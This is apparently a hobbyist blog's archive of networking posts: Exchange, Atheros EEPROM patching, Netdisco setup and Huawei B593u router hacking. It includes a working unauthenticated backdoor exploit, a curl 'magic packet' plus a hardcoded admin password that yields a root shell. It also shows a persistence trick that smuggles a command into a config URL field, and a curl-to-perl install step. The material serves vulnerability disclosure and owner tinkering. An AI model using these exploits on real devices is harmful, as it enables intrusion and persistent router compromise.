Monday, September 01, 2014

Export all SMTP addresses from Exchange using PowerShell

Tested with Exchange 2010. You'll need Exchange Management shell but no need for exchange admin rights.

Get-Recipient -ResultSize unlimited | Select Name -ExpandProperty EmailAddresses | Where-Object {$_.SmtpAddress -ne $null} | Select Name,SmtpAddress,IsPrimaryAddress | Export-csv -Encoding unicode -NoTypeInformation AllEmailAddress.csv

Sunday, August 31, 2014

How to change Atheros AR9xxx aka ath9k EEPROM values

One of my Atheros AR9280 minipcie cards had some odd undefined regulatory domain (0x6B) configured. This caused even latest Linux ath9k driver to break so I wanted to change it to valid regdom. Which ath9k developers think is sin and are trying to prevent people from doing, but luckily our old friend iwleeprom has Atheros support letting us to fix this.

# The usual preparations
apt-get update
apt-get -y install git subversion build-essential

# Download atheros branch of iwleeprom and compile it
mkdir -p /opt/iwleeprom
cd /opt/iwleeprom
svn checkout http://iwleeprom.googlecode.com/svn/branches/atheros/ atheros
cd atheros
make

# Shutdown wifi
ifdown wlan0

# Find PCI ID of your device using lspci
lspci

# Mine was 03:00.0
# 03:00.0 Network controller: Qualcomm Atheros AR928X Wireless Network Adapter (PCI-Express) (rev 01)

# Init card
./iwleeprom -d 0000:03:00.0 -I

# Verify that card is properly identified
./iwleeprom -d 0000:03:00.0 -s

# Backup current eeprom content
./iwleeprom -d 0000:03:00.0 -o original.bin

# Patch country code from non-standard 0x6B to WOR5_ETSIC 0x65
cp original.bin etsic0x65.bin
echo -ne '\x65' | dd of=etsic0x65.bin bs=1 seek=520 conv=notrunc

# Program patched eeprom back to device
echo Y|./iwleeprom -d 0000:03:00.0 -i etsic0x65.bin

# Verify that regdom was changed
# Take note of last CRC line as this is new CRC we need
# For example "CRC (eval)  : fb27"
./iwleeprom -d 0000:03:00.0 -s

# Patch eeprom to use proper CRC
# You need to reverse byte order here
cp etsic0x65.bin etsic0x65crc.bin
echo -ne '\x27\xfb' | dd of=etsic0x65crc.bin bs=1 seek=514 conv=notrunc

# Program crc patched eeprom back to device
echo Y|./iwleeprom -d 0000:03:00.0 -i etsic0x65crc.bin

# Verify that crc matches now
./iwleeprom -d 0000:03:00.0 -s

# Export changed eeprom content
./iwleeprom -d 0000:03:00.0 -o new.bin

# Ensure what we wrote and read match
md5sum etsic0x65crc.bin new.bin

# Reload ath9k.ko
rmmod ath9k
modprobe ath9k

# Turn wifi back on
ifup wlan0

# Check dmesg for more details

Saturday, August 30, 2014

Modifying Huawei B593u firmware images using FMK

Nothing special here in my opionion, but I've seen few comments saying that FMK doesn't work with Huawei B593u. Just follow instructions below and you end up with normal firmware image having one important difference - you can telnet in as admin from LAN side of device.

This is for latest T-Mobile firmware SP106, but adjust firmware identifiers and it'll work for others as well.

# Install some tools needed
sudo apt-get update
sudo apt-get -y install git build-essential zlib1g-dev liblzma-dev python-magic zip unzip

# Download and compile fmk
mkdir -p ~/fmk
cd ~/fmk
git clone https://code.google.com/p/firmware-mod-kit/
cd firmware-mod-kit/src
./configure
make

# Download and unpack B593u firmware
mkdir -p ~/fmk/106
cd ~/fmk/106
wget "http://hilfe.telekom.de/dlp/eki/downloads/Speedport/Speedport%20LTE%20II/Firmware_Speedport_LTE_II_B593u-12_V100R001C748SP106.zip"
unzip Firmware_Speedport_LTE_II_B593u-12_V100R001C748SP106.zip
tar xvf V100R001C748SP106.tar.bz2 

# Extract trx
~/fmk/firmware-mod-kit/extract-firmware.sh B593.trx 

# Make backup of file we're going to patch
cp -a fmk/rootfs/bin/cms fmk

# Allow inbound telnet from LAN
# Make sure your replacement string is exactly same length as original!
sed fmk/rootfs/bin/cms -i \
    -e's|iptables -A INPUT_SERVICE -p tcp  --dport 23 -j DROP 2>/dev/null|iptables -I INPUT -s 192.168.1.0/24 -j ACCEPT ##################|g'

# Check that original and modified binaries are same size but have different date stamps
ls -l fmk/cms fmk/rootfs/bin/cms

# Remove some unnecessary files to shrink squashfs image and keep fmk happy
rm -f fmk/rootfs/sbin/mkntfs

# Update version string in headers so device already running SP106 will accept our customized version
sed -i.bak fmk/image_parts/header.img \
    -e's|V100R001C748SP106\x00\x00\x00|V100R001C748SP106hax|g'

# Rebuild trx
~/fmk/firmware-mod-kit/build-firmware.sh

# Create new firmware archive
mv fmk/new-firmware.bin B593.trx
chmod 0644 B593.trx modem.bin help.tar.bz2 B593-small.trx
tar --owner=LTECPE --group=LTECPE -cvjf V100R001C748SP106_TELNET.tar.bz2 B593.trx modem.bin help.tar.bz2 B593-small.trx

# Cleanup
sudo rm -rf fmk

Done, upload V100R001C748SP106_TELNET.tar.bz2 to your router

After firmware upgrade simply telnet from LAN to 192.168.1.1. Usually first attempt fails with connection refused but try again after few seconds and it'll work. Login as "admin" with password "HW4GCPE". When in ATP prompt type "shell" to open root shell.

Almost same procedure works for B593u-91 although as I don't have u91 resulting firmware has not been tested.

mkdir -p ~/fmk/u91
cd ~/fmk/u91
wget https://www.dropbox.com/s/ij2npnp6klweaxa/u91_r%2Bm%2Bh%2Bs.tar.bz2
tar xvf u91_r+m+h+s.tar.bz2
~/fmk/firmware-mod-kit/extract-firmware.sh B593.trx 
cp -a fmk/rootfs/bin/cms fmk
sed fmk/rootfs/bin/cms -i \
    -e's|iptables -A INPUT_SERVICE -p tcp  --dport 23 -j DROP 2>/dev/null|iptables -I INPUT -s 192.168.1.0/24 -j ACCEPT ##################|g'
ls -l fmk/cms fmk/rootfs/bin/cms
rm -f fmk/rootfs/sbin/mkntfs
sed -i.bak fmk/image_parts/header.img \
    -e's|V100R001C00SP053\x00\x00\x00|V100R001C00SP053hax|g'
~/fmk/firmware-mod-kit/build-firmware.sh
mv fmk/new-firmware.bin B593.trx
chmod 0644 B593.trx product_info modem.bin help.tar.bz2 B593-small.trx
tar --owner=LTECPE --group=LTECPE -cvjf V100R001C00SP053_TELNET.tar.bz2 B593.trx modem.bin product_info help.tar.bz2 B593-small.trx
sudo rm -rf fmk


Thursday, August 28, 2014

Inside old Motorola (Symbol) AP-5131 access point

I found couple Motorola AP-5131 802.11a/g access points today. It's old design from Symbol Technologies dating back to 2005 with manufacturing date from 2010.

Looks like those APs had very decent design and hardware specs, especially for something that old. It's running MontaVista Linux with kernel 2.4.30. Intel Xscale 425 at 266MHz, 64MB RAM, 64MB flash, 2MB bootflash, two 100Mbit/s Ethernet interfaces (Altima AC101L MII PHY), 802.3af PoE support and two minipci slots. WLAN is rare Intersil / Conexant GW3888.

Bootloader is something custom Symbol built. With JTAG pins on board, what overall seems like reference design from Intel just in different shape, it should be fairly easy to run OpenWrt on this. Figure out how GPIO are mapped, replace bootloader with RedBoot and that's about it. Stock bootloader might be fine as well, haven't really looked as this is old and there's only two of them so not really that interested myself. Especially since there's no drivers for WLAN.

Top side

Bottom side

Intel Xscale IXP425 CPU

2 * 32MiB RAM

64MiB NAND flash for OS

2MiB NAND flash for bootloader

Intersil / Conexant GW3888 based WLAN

Intersil ISL3692 radio

Complete set of images here.

Win95 / NT4 / 2000 / XP drivers for WLAN card are available from Microsoft. Some ancient FreeBSD drivers claim to support ISL3888 (which is same as GW3888), but I have some doubts if that's actually true. Intersil / Conexant codename for 3888 is "Isotope", this was on Motorola / Symbol AP-300 release notes as apparently AP-300 was upgraded from regular Prism54 to "Isotope" at some point.


Saturday, August 23, 2014

Netdisco2 on Ubuntu 14.04

Netdisco is neat tool to collect layer-2 forwarding database from switches, match MACs with layer-3 ARP table from router and present it over searchable webui.

Old "Netdisco 1" was quite horrible to setup, but it did still do its job. Recently "Netdisco 2" was released making admins life much easier and also bringing fancy new look for webui.

So here's my notes about installing new virtual machine with Netdisco 2.


# Install Ubuntu 14.04.1 LTS Server x64 with defaults

# After install login and switch to root
sudo su -

# Update system
apt-get update
apt-get -y dist-upgrade

# Add some basic tools we like
apt-get -y install openssh-server open-vm-tools build-essentials joe wget screen lftp mtr-tiny zip ntp

# Get rid of some spyware
apt-get -y remove popularity-contest

# Disable IPv6 support on next reboot
echo "net.ipv6.conf.all.disable_ipv6=1" >>/etc/sysctl.conf


# Install caching DNS server to reduce and speedup DNS queries sent when Netdisco is operating
apt-get -y install dnsmasq

# Generate config file for dnsmasq
cat <<'__EOF__' >/etc/dnsmasq.d/custom.conf
neg-ttl=180
max-ttl=600
all-servers
domain-needed
bogus-priv
filterwin2k
server=8.8.8.8
server=8.8.4.4
server=208.67.222.222
server=208.67.220.220
interface=lo
__EOF__

# Remove DNS breaking resolvconf package
apt-get -y remove resolvconf

# Fix DNS resolver settings to use local DNS first with Google and OpenDNS as fallback
# Normally I wouldn't use OpenDNS but I'm giving them new chance now that they stopped
# hijacking NXDOMAIN queries.
cat <<'__EOF__' >/etc/resolv.conf
search mpoli.fi
options timeout:5
nameserver 127.0.0.1
nameserver 8.8.8.8
nameserver 208.67.222.222
__EOF__

# Don't mess with resolv.conf via /etc/network either
sed -i.bak -e's|dns-|#dns-|g' /etc/network/interfaces

# Restart dnsmasq so our changes are activated
service dnsmasq restart


# Install Netdisco deps
apt-get -y install libdbd-pg-perl libsnmp-perl postgresql pgtune fping

# PostgreSQL configuration for better performance, defaults are good for Pentium Pro at 200MHz
mv /etc/postgresql/9.3/main/postgresql.conf /etc/postgresql/9.3/main/postgresql.conf.old
pgtune -i /etc/postgresql/9.3/main/postgresql.conf.old -o /etc/postgresql/9.3/main/postgresql.conf

# Switch to postgres user and create new SQL user
su - postgres
createuser -DRSP netdisco
# Enter some password here
createdb -O netdisco netdisco

# Switch back to root
exit


# Netdisco install based on instructions from
# https://metacpan.org/pod/App::Netdisco#Installation

# Add new user account for Netdisco
adduser netdisco --shell /bin/bash --disabled-password --gecos netdisco

# Switch to netdisco user and install required perl components under user homedir
su - netdisco
curl -L http://cpanmin.us/ | perl - --notest --local-lib ~/perl5 App::Netdisco

# Create some links
mkdir ~/bin
ln -s ~/perl5/bin/{localenv,netdisco-*} ~/bin/

# Test install
~/bin/netdisco-daemon status

# Create config file with your postgresql username and password, default SNMP communities etc.
# See examples in ~/perl5/lib/perl5/auto/share/dist/App-Netdisco/environments/deployment.yml
cat <<'__EOF__'>~/environments/deployment.yml
database:
  name: 'netdisco'
  user: 'netdisco'
  pass: 'S3cretForYouAndMe'
safe_password_store: true
snmp_auth:
  - tag: 'default_1'
    community: 'notsopublic'
    read: true
    write: false
  - tag: 'default_2'
    community: 'public'
    read: true
    write: false
schedule:
  discoverall:
     when: '5 1,7,13,19 * * *'
  macwalk:
     when: '35 1,7,13,19 * * *'
  arpwalk:
     when: '45 1,7,13,19 * * *'
  nbtwalk:
     when: '55 1,7,13,19 * * *'
  expire:
     when: '15 23 * * *'
dns:
  max_outstanding: 50
workers:
  tasks: 'AUTO * 5'
__EOF__

# Build initial database
# You will be asked for webui admin credentials etc.
~/bin/netdisco-deploy

# Create script to start Netdisco
cat <<'__EOF__' >~/run-netdisco.sh
#!/bin/bash
~/bin/netdisco-web start
sleep 5
~/bin/netdisco-daemon start
__EOF__
chmod a+x ~/run-netdisco.sh

# Launch it
~/run-netdisco.sh

# Verify functionality with browser by opening http://netdisco.foo.bar:5000/
# Login using admin account just created
# Enter IP of switch or router to add and click discover
# If you have proper SNMP communities and LLDP/CDP settings in place it should discover entire site straight away

# Return to root shell
exit

# Autostart netdisco after reboot
echo "( sudo su - netdisco -c '/home/netdisco/run-netdisco.sh' ) &" >/etc/rc.local


# Following steps are needed only if you don't have SNMP read access to upstream router
# but have Linux server in subnet you want to monitor.

# Enable local SNMP server
apt-get -y install snmpd
mv /etc/snmp/snmpd.conf /etc/snmp/snmpd.conf.old
cat <<'__EOF__'>/etc/snmp/snmpd.conf
rocommunity notsopublic
sysservices 79
agentaddress 127.0.0.1
# only listens on lo interface assuming this is same host that Netdisco is running
__EOF__

# Restart snmp
service snmpd restart

# Because we don't have SNMP read rights to ISP router we must keep local ARP table populated manually
fping -g 11.22.0.0/23   -b 24 -c 1 -B 1 -p 25 -q -r 1 -t 100

# Discover 127.0.0.1 via Netdisco webui next

# Schedule fping to run slightly before arpnip/arpwalk
cat <<'__EOF__' >>/etc/crontab
     when: '45 1,7,13,19 * * *'
44 1,7,13,19 * * * fping -g 11.22.0.0/23   -b 24 -c 1 -B 1 -p 25 -q -r 1 -t 100 >/dev/null 2>/dev/null
__EOF__

# Restart cron
service cron restart


# Now would be good time to restart server so all changes are applied and to make sure Netdisco 
# will come up after boot.
reboot


# Later to install netdisco updates
# (Take backup first.. of course)

# Switch to netdisco user
sudo su - netdisco

# upgrade Netdisco
~/bin/localenv cpanm --notest App::Netdisco

# apply database schema updates
~/bin/netdisco-deploy

# restart web service
~/bin/netdisco-web restart

# restart job daemon
~/bin/netdisco-daemon restart

Tuesday, August 19, 2014

Huapwn - Backdoor on your Huawei B593u

Public Huawei document I linked couple days ago mentioned factory diagnostics tool called "Huawei deviceLocker V0.1" that will grant access to root shell on router. I got curious on how this would actually work and came to conclusion it must be something extremely simple and insecure, it IS Huawei after all. Did some poking around /bin/web process I figured this out - it's all there in clear-text for anyone to read. And that admin password is in Huawei docs, not exactly secret either. In case you didn't realize there's no need for authentication to exploit this. Protip: Try to hide you backdoors a bit better next time.

# Send magic packet that enables telnet, timeout error is expected
curl -m5 \
-d "switch=0&handshakeFlag=zzfdfwetljioi34004t50jodjgkjgjiyte894uifdug89h98y3hjhgjdgjuihjqq" \
http://192.168.1.1/portconfig.cgi

telnet 192.168.1.1
# if telnet says connection refused keep trying every few seconds, it'll work
# if telnet just hangs and timeouts then port is not open and no point retrying with telnet
# login: admin
# pass: HW4GCPE
# type "shell" or "sh" to open root shell

To be fair Huawei is at least trying since this backdoor HAS been closed recently. Not that I could find any public disclosure about exactly this hole. B593u is rather common device (at least in Europe) and most operators still only distribute old firmware versions where this hole is present.

Polkomtel SP103 and T-Mobile SP102/SP104/SP105 (which are latest known firmwares for B593U-12) have slightly different /bin/web binary than older builds. Newer versions still have same backdoor function present using same "handshake", but portconfig.cgi is no longer in list of accepted URLs. It's not actual CGI, /bin/web simply have list of URLs and which internal functions to trigger for them. This list have been edited to either remove this backdoor, or worse, to hide it and still allow triggering in some other way.

So unless you're willing to take risk with flashing unsupported firmware customized for another operator your router is just waiting to be hacked. Hacked permanently that is.

Combined with persistent hack I posted few hours ago malicious hackers could seriously own device and not even factory reset paired with full firmware upgrade can help you. Or have you seen many anti rootkit tools for routers lately?


Persistent customizations to Huawei B593u with stock firmware

Perhaps you're fairly satisfied with Huawei stock firmware but would like to fix some security problems and remove spyware installed by factory. There's fairly easy way to do this.

You need root level access to shell on device via one of many vulnerabilities present. This one is easy. Compiling new binaries with stock Broadcom toolchain is easy as well. Problem is how to make them persistent so customizations made load when device is rebooted.

Answer is actually quite simple. Create script under /upgflash - which is 256MB USB flash device embedded inside router. Let's be creative and call this script "rc.local". Inside script put following two lines:

#!/bin/sh
/bin/iptables -I INPUT -s 192.168.1.0/24 -j ACCEPT

Make script executable. This will after each reboot grant you telnet access to device from internal subnet (assuming default IP range).

Export current configuration from flash to /tmp/flashinfo.bin.
flashtest export e00000 262144

Load file in hex-editor and search for "HttpUpg UpdateURL". Depending on your location it'll be something like "update-westerneurope.huaweidevice.com". Replace this with ";/upgflash/rc.local;.huaweidevice.com". Just make sure to keep string length intact so you don't have to update content length info in beginning of flashinfo.bin. DO NOT MAKE FILE BIGGER THAN 262144 BYTES, OTHERWISE YOU'LL END UP OVERWRITING FACTORY DEFAULT CONFIG -> DEAD DEVICE NEXT TIME YOU DO FACTORY RESET.

Write modified configuration back to device
flashtest load flashinfo.bin e00000

Reboot with force to make sure our config stays
reboot -f

What this does is trick system to execute /upgflash/rc.local script on every reboot instead of sending your device and SIM information to Huawei.


You can safely use around 100MB of /upgflash without running into risk of breaking things when doing firmware upgrades. This modification will also persist between firmware upgrades although I highly recommend doing factory reset, upgrade and then adding hacks back. For example you don't want to mess with modem firmware upgrade process and end up bricking it.

What to do with this hack? Like said compile binaries with broadcom toolchain and use them. Perhaps even chrooted mipsel debian on usb stick so you don't have to be limited to Huawei world.

Unlike major modifications such as replacing stock firmware with OpenWrt this will let you keep stock features while also make it possible to add new customizations.

----------

It's possible to compile working binaries with toolchain from Asus router using same chipset. Below works for Ubuntu 14.04 x64.



apt-get install lib32z1 lib32ncurses5 lib32bz2-1.0 unzip
mkdir -p /opt/asus
cd /opt/asus
unzip GPL_RT_N53_30043744561.zip
cd GPL_RT_N53_30043744561
tar xvf GPL_RT-N53_3.0.0.4.374.4561-g5f5c8d8.tgz 
mv asuswrt /opt/
ln -s /opt/asuswrt/tools/brcm /opt/brcm

When compiling:

export PATH=$PATH:/opt/brcm/hndtools-mipsel-linux/bin:/opt/brcm/hndtools-mipsel-uclibc/bin
./configure --build=x86_64-linux-gnu --host=mipsel-linux-uclibc

----------

Saturday, August 16, 2014

Unpacking Huawei B593u compressed Broadcom CFE bootloader

Sorry, one more B593u post but felt this is worth documenting.

While hacking my way into Huawei B593u I had big problem with Huawei crippled CFE bootloader. It was not talking to me and when I finally did get it to talk to me it was only one way. All I could see was CFE> prompt after smashing ^C but nothing else.

I had already dumped CFE from flash by now so I obviously went to check it out but there was not much to see. So I ran binwalk and it told me CFE contained LZMA compressed data. Ah-ha! Initial bootloader decompresses LZMA part which will contain all the juicy bits.

Yet I couldn't unpack this LZMA blob. It was not total misidentification by binwalk either, clearly compressed data. Maybe it's not LZMA? After some failed attempts I remembered similar problem with Realtek squashsfs couple years ago. Back then problem was due newer LZMA decompressors being incompatible with outdated versions all these WiFi SoC vendors love to use.

I was able to extract Huawei compressed CFE using binary named "lzma_4k" which is part of Asus RT-N56U GPL release. I don't have sources for this so you'll need Linux system capable of running i386 binaries. Compiling old enough LZMA SDK might be enough, lzma_4k identifies itself as "LZMA Utility 4.63 : Igor Pavlov : Public domain : 2008-12-31", but no idea how many patches from Broadcom it contains.

# Find offset of compressed CFE
binwalk 0x000000-0x040000.bootloader 

38132           0x94F4          LZMA compressed data, properties: 0x5D, dictionary size: 8388608 bytes, uncompressed size: 219824 bytes

# Skip beginning
dd if=0x000000-0x040000.bootloader bs=38132 skip=1 of=boot.lzma

# Get compatible lzma binary
wget --no-check-certificate "https://github.com/rrelmy/asus-rt-n56u-firmware/blob/master/src/ctools/lzma_4k?raw=true"

# Unpack
lzma_4k d boot.lzma boot

Quick "strings" on uncompressed boot loader reveals some interesting nvram parameters, namely "console_disable" which we simply set to 0 and like that serial port comes alive with CFE 5.60.120.9.


Latest modem.bin LTE dongle firmware for Huawei B593u-12

Latest modem.bin firmwares currently available are T-Mobile customized 11.533.03.03.748 (2013-09-30) from SP105 and generic 11.433.61.00.00 (2012-12-04) from Polkomtel SP103. While these are customized for EM920u according to few forum posts I've found they work equally with Huawei USB LTE dongles such as E392 part of same MDM9200 family.

Polkomtel one is generic as there's no operator ID in end of firmware version. Which means T-Mobile has requested some sort of LTE modem firmware customizations from Huawei. I haven't noticed any difference in functionality myself, but depending on your operator there might be some.

You can check version after opening SSH connection to router using "lteat" command.

# lteat
AT>at^rdcust=?

Vodafone B2000 branded Huawei B593u-12 running T-Mobile SP105 with T-Mobile modem.bin (11.533.03.03.748 / 2013-09-30)
   (0: 1)  (1: 0)  (2: 0)    (3: 0)  (4: 0)  (5: 0)  (6: 0)  (7: 0)
   (8: 0)  (9: 0) (10: 0)   (11: 0) (12: 1) (13: 0) (14: 0) (15: 0) 
  (16: 0) (17: 0) (18: 0)   (19: 0) (20: 0) (21: 0) (22: 0) (23: 1) 
(25: 0 0) (26: 0) (27: 1) (28: 1 1) (29: 1) 


Vodafone B2000 branded Huawei B593u-12 running Polkomtel SP103 with generic modem.bin (11.433.61.00.00 / 2012-12-04)
   (0: 0)  (1: 0)  (2: 0)    (3: 0)  (4: 0)  (5: 0)  (6: 0)  (7: 0) 
   (8: 0)  (9: 0) (10: 0)   (11: 0) (12: 1) (13: 0) (14: 0) (15: 0) 
  (16: 0) (17: 0) (18: 0)   (19: 0) (20: 0) (21: 0) (22: 0) (23: 1) 
(25: 0 0) (26: 0) (27: 0) (28: 1 1) (29: 1) 

Did you spot it? #27 is different. Not that I would much idea what that means or if it matters. Quick googliohakuplaza search says it doesn't matter as long as SIM card used works with modem firmware. So it's not like some frequency would be disabled or other nasties.

This forum post provides bit more information of these registers, but not much about #27 we're most interested.

0       Replace Firmware Version                True
1       ?Forbid 2G registration                 False
2       Forbid AT^CURC type/port                False
3       Change Mean TPT Size                    False
4       Change MTU size                         False
5       Replace Product ID (PID)                False
6       Change APN values                       False
7       Disable Video Calls                     False
8       Change USSD Mode                        False
9       Change? Full Frequency Scan             False
10      ?       LED Light                       False
11      Exclusive Cardlock                      False
12      Huawei Special SIM lock                 True
13      Permanent Cardlock                      False
14      Class-0 SMS Route                       False
15      Roaming HPLMN (count?)                  False
16      Diasble RPLMN (PME?)                    False
17      Change GPRS Recent Activity Timer       False
18      Change Default Traffic Class            False
19      Change STK                              False
20      Huawei Manual 3G? band Search Order     False
21      Current ^SYSCFGEX Mode List             False
22      Get/Set Attach PDP Parameters           False
23      Disable F-DPCH (WCDMA)                  True
24      Huawei IPV4 and IPV6 Configuration      N/A
25*     ?       Modified UI Network PLMN        False
26      [1] GID1 Customer Forbid Band           False
27      [1] Start Telus GID1 check              True for T-Mobile, False for generic / Polkomtel
28*     Set HS-DSCH Physical Layer Category     True
29      [1] Set GID1 LTE Band Preference        True

*   Returns 2 digits in E589u-12. 
[1] GID1 = "Group Identifier Level 1" and is a type of SIM network 
    lockout mechanism. The GID1 elementary files on the SIM are 

    specified in GSM 11.11 (ETS 300 977)


Differences of Huawei B593u and B593s

I got few B593u models and it's pretty straight forward Broadcom BCM5358 based router with Linux. As usual GPL sources were never published by Huawei crooks. LTE modem side is simply Qualcomm MDM9200 based Huawei USB dongle connected internally to Broadcom SoC over USB.

Perhaps luckily I don't have any B593s models, since unpacking firmware shows it's Huawei HiSilicon Hi6920 (HiSilicon V71R paired with Balong 710 baseband) based and running concurrently both VxWorks 6.8 and Android. Huawei E5172 is probably closely related. Huawei code looks like VxWorks bits are very much baseband related leaving rest of intelligence for Android side.

In essence this is much more closer to Android mobile phone or tablet with wired ports than traditional broadband router. Perhaps one core is running Android while another is VxWorks? There's even two different Linux kernels referenced. Are they both used in addition to VxWorks? Hard to say from just firmware image as these things are filled with dead code paths and features which never gets used.

Partitions present:
BootLoad, NvBackLTE, NvBackGU, BootRom, VxWorks, Logo, FastBoot, kernel, yaffs0 .. yaffs6 and cdromiso.

BootLoad:
Balong V7R1 MCore bootloader...
Compile date: May 14 2013
Compile time: 11:54:47
press space key to enter bootrom:
ERROR:too many fails ,VXWORKS region is damaged, switch to BOOTROM.
BOOTROM_V01.02 H6920CS_UDP

BootRom:
V700R001C50B180

VxWorks:
VXWORKS
V700R001C50B180
ARM RealView PBX-A9
HiLteFe(0,0) host:vxWorks h=192.168.255.2 e=192.168.255.1:ffffff00 u=anonymous pw= tn=targetname
H:/CPE/compile/21.180.15.00.00/PLT/DRV_CODE/COMM_CODE/bsp/common/BSP_GLOBAL.c
C:/WindRiver/vxworks-6.8/target/config/comps/src\usrMmuInit.c
PWRCTRL_E5172CheckBatteryVol
/yaffs0/isover.bin
/yaffs0/WebUIVer.bin
/yaffs0/update.log
/yaffs0/update/firmware1.7z
/yaffs0/update/firmware2.7z
/yaffs0/update/iso.7z
/yaffs0/update/web_ui.7z
/yaffs0/ZSP.bin
/yaffs0/Nvim/
/yaffs0/Nvim/NvimCtrl.bin
/yaffs0/Nvim/NvimAuth.bin
/yaffs0/NvimBackup
/yaffs0/NvimBackup/
/yaffs0/NvimBackup/NvimCtrl.bin
/yaffs0/Nvim/Nvim.bin
/yaffs5/firmware1.bin
/yaffs5/firmware2.bin
/yaffs5/iso.bin
/yaffs5/web_ui.bin
/yaffs2/userdata/update_info.bin
HPA_GUAdjustRFVoltage: HPA_ADJUST_RF_VOLTAGE_INCREASE 1 V = %d Error!!!
Start DCXO NV UPDATE!
/yaffs0/SystemCmd.cmf
OM_AutoConfig: The config file is not exsit!
OM_AutoConfig: The Msg Len is too big : %d!
Secure Storage Key
Debug port protect Secure Storage Key
Integrity Protection Key
/yaffs0/SC/Pers/CKFile.bin
/yaffs0/SC/Pers/DKFile.bin
/yaffs0/SC/Pers/AKFile.bin
/yaffs0/SC/Pers/PIFile.bin
/yaffs0/SC/Pers/CKSign.hash
/yaffs0/SC/Pers/DKSign.hash
/yaffs0/SC/Pers/AKSign.hash
/yaffs0/SC/Pers/PISign.hash
/yaffs0/SC/Apsec/SecureDataA.bin
/yaffs0/SC/Apsec/SecureDataC.bin
Secure Storage Key
AT Secure Storage Key
Secure AT Key
E:/l00227173_view_C50B170_PHONE_GUL_129/PS_CODE/LTE_CODE/PS/Src/Rrc/Main/Src/LRrcOmItf.c
RRC_OMITF_ProcMaxTxPowerReq:input ptr null! ulMsgId =, pMsg =
RRC_OMITF_ProcMaxTxPowerReq, MaxTxPower

ANDROID!|
root=/dev/ram0 rw console=ttyAMA0,115200 console=uw_tty0 rdinit=/init mem=144m
/home/zqc/src/43236/custom/huawei/4.5.1/bin/../lib/gcc/arm-none-linux-gnueabi/4.5.1/include
/home/zqc/src/43236/173/src/shared/bcmwifi/include
/opt/CodeSourcery/Sourcery_G++_Lite/bin/../lib/gcc/arm-none-linux-gnueabi/4.5.2/include
Linux MBB-V7R1-CPE 2.6.32-21-generic #32-Ubuntu SMP Fri Apr 16 08:09:38 UTC 2010 x86_64 GNU/Linux

root=/dev/ram0 rw console=ttyAMA0,115200 rdinit=/linuxrc mem=28M
Linux version 2.6.35.7 (q81003564@MBB-V7R1-CPE) (gcc version 4.5.1 (ctng-1.8.1-FA) ) #1 PREEMPT Tue May 14 11:52:35 CST 2013
balong_tft_init
balong_tft_store
balong_tft_ioctl
DMS_OpenHsicPort
MPWUDP
E392s
CH1E392DM
B710S0
E392
E3276s-150
CH1E3276SM
E3276
E5776s
CL1E5776SF
B710D0
102HW
E5776s-860
CL3E5776SM
E5776s-71
CL1E5776SS
GL04P
B593s-22
CL1E5172M
B710C0
E5172s-920
E5172
B593s-601
E5172s-515
B593s-12
PV500
PORTING
B593s-850
/home/q81003564/q81003564/hi6920cs_b593s_22/PS_CODE/Build_LTE/APP_CORE/../../../PS_CODE/COMM_CODE/NDIS/Src/PsNdis.c

# ADDITIONAL_DEFAULT_PROPERTIES
ro.secure=0
ro.allow.mock.location=1
ro.debuggable=1
persist.service.adb.enable=1
init.goldfish.rc
on boot
    setprop ARGH ARGH
    setprop net.eth0.dns1 10.0.2.3
    setprop net.gprs.local-ip 10.0.2.15
    setprop ro.radio.use-ppp no
    setprop ro.build.product generic
    setprop ro.product.device generic# mount mtd partitions
# Mount /system rw first to give the filesystem a chance to save a checkpoint
    mount yaffs2 mtd@/yaffs2 /data
    mount yaffs2 mtd@/yaffs1 /system
    mount yaffs2 mtd@/yaffs1 /system ro remount
    mount yaffs2 mtd@/yaffs3 /app
#    mount yaffs2 mtd@/yaffs5 /online
    mount yaffs2 mtd@/yaffs4 /cpedata
        mount yaffs2 mtd@/yaffs4 /cpedata ro remount
#    mount yaffs2 mtd@/yaffs2 /data nosuid nodev
#    mount yaffs2 mtd@cache /cache nosuid nodev
    mkdir /data/userdata
    mkdir /data/equipdata
#service insmodko /etc/insmodko.sh
#    oneshot
#service autorun /etc/autorun.sh
#    oneshot
on post-fs
    # once everything is setup, no need to modify /
    mount rootfs rootfs / rw remount
    # We chown/chmod /data again so because mount is run as root + defaults
    chown system system /data
    chmod 0771 /data
    chmod 0771 /app
    chmod 0777 /data/userdata
    chmod 0777 /data/equipdata
service balonginit /bin/balonginit  

CANNOT READ BOOT IMAGE HEADER
ANDROID!
INVALID BOOT IMAGE HEADER
start flash read kernel image(offset:0x%x len:0x%x)
CANNOT READ KERNEL IMAGE
finish flash read kernel image(skip_len=0x%x)
start flash read ramdisk image(offset:0x%x len:0x%x)
CANNOT READ RAMDISK IMAGE
finish flash read ramdisk image(skip_len=0x%x)
start wait c core...
finish waiting...
kernel  @ %x (%d bytes)
ramdisk @ %x (%d bytes)
mem=50M console=null
cmdline = '%s'
Booting Linux
BalongV7R1 ASIC ACore fastboot...
 ** BOOTING LINUX FROM FLASH **
 hdr is NULL
 Bootimg magic is '%s'

HUAWEI_VERSION=B593s-22
HUAWEI_RELEASE=ATP
ATP_PLT_VERSION=V100R003C05B001
HUAWEI_EXTRAVERSION=V200R001B180D15SP00C00
HUAWEI_INTRSWVERSION=V200R001B180D15SP00C00
HUAWEI_HWVERSION=Ver.B
#CFE
CFE_BASE_VERSION=V200R001B180D15SP00C00
#WEB
HUAWEI_EXTRAVERSION_WEB=V200R001B180D15SP00C00


How to capture LTE WAN traffic for diagnostic purposes on Huawei B593u and not so much of security

Found this document on Huawei webpage you might be interested. It's in Microsoft Word .docx format.

http://www.huawei.com/ecommunity/3msimage/download-10060827-10000297-9bca6ae8ffa54796a5245e6650b0e607.bin?type=bbs

Doc shows how to access Qualcomm diagnostic interface of EM920u module inside B593 using QXDM and QPST.

It also shows how to gain root access to device using something called "Huawei deviceLocker V0.1" diagnostics tool. Which I find worrying as there appears to be some magic-packet that can be sent to device to bypass protections. Document also has same hard coded admin password listed that I found out on my previous post.

There's also mass firmware upgrade tool out that will upgrade multiple devices at once. All B593's to upgrade must be connected to same isolated LAN, PC client will then send firmware to devices using multicast. No authentication is required. Seek for document named "LTE CPE B593u Binary Upgrade Guide.doc" and "B593_upgrade.exe" application.

For upgrades Huawei uses multicast address 224.0.0.119 and binary on router side is /bin/multiupg.

Serial console on Huawei B593u

Here's location of Huawei B593u TTL serial console. Settings are usual 115200 8N1.

If you're using typical USB TTL serial port adapter you only need RX, TX and GND. Make sure your pins are properly labeled as for example my USD 0.99 including shipping CP210x have TX and RX labels reversed.


